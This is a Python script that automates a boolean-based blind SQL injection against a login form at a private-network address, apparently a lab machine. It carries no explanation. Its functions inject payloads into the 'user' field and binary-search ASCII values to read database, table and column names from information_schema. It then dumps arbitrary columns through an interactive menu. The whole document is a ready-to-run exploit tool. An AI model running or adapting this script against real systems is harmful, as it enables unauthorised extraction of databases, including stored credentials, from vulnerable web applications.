1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165
| import requests import time
host = "http://192.168.56.136/login.php"
def getDatabase(): global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload= "1' or (ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))<%d) # " % (i,mid) param ={"user":payload,"password":"admin","s":"Submit"} res = requests.post(host,data=param) if "1" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("database is -> "+ans)
def getTable(database_name): global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload= "1' or (ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='%s')),%d,1))<%d) # " % (database_name,i,mid) param ={"user":payload,"password":"admin","s":"Submit"} res = requests.post(host,data=param) if "1" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("table is -> "+ans) return ans
def getColumn(database_name,table_name): global host ans='' for i in range(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload= "1' or (ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='%s' and table_schema = '%s')),%d,1))<%d) #" % (table_name,database_name,i,mid) param ={"user":payload,"password":"admin","s":"Submit"} res = requests.post(host,data=param) if "1" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("column is -> "+ans)
def dumpTable(database_name,table_name,column_name): global host ans=''
for i in range(1,10000): low = 32 high = 128 mid = (low+high)//2 while low < high:
payload= "1' or (ascii(substr((select(group_concat(%s))from(%s.%s)),%d,1))<%d) #" % (column_name,database_name,table_name,i,mid)
param ={"user":payload,"password":"admin","s":"Submit"}
res = requests.post(host,data=param) if "1" in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32 or mid >= 127: break ans += chr(mid-1) print("dumpTable is -> "+ans)
def main():
user_input = input("0:getDatabase, 1: getTable, 2: getColumn, 3: dumpTable. \nplease input the number of what you what:") print(user_input) if user_input == "0": getDatabase() elif user_input =="1": database_name = input("please input the name of database that you want to get:") tables_name = getTable(database_name) continue_getdata = input("\nDo you want to continue getting columns ?(please input y or n)\n") if continue_getdata =="y": table_name = input("please input the name of table that you want to get:") getColumn(database_name,table_name) else: return
continue_getdata = input("\nDo you want to continue getting data ?(please input y or n)\n")
if continue_getdata =="y": column_name = input("please input the columns of table that you want to get(use ',' to join different columns):") dumpTable(database_name,table_name,column_name) else: return
elif user_input=="2": database_name = input("please input the name of database that you want to get:") table_name = input("please input the name of table that you want to get columns:") getColumn(database_name,table_name)
continue_getdata = input("\nDo you want to continue getting data ?(please input y or n)\n")
if continue_getdata =="y": column_name = input("please input the columns of table that you want to get(use ',' to join different columns):")
dumpTable(database_name,table_name,column_name) else: return
elif user_input=="3": database_name = input("please input the name of database that you want to get:") table_name = input("please input the name of table:") column_name = input("please input the columns of table (use ',' to join different columns):") dumpTable(database_name,table_name,column_name)
else: print("check your input")
if __name__ == "__main__": main()
|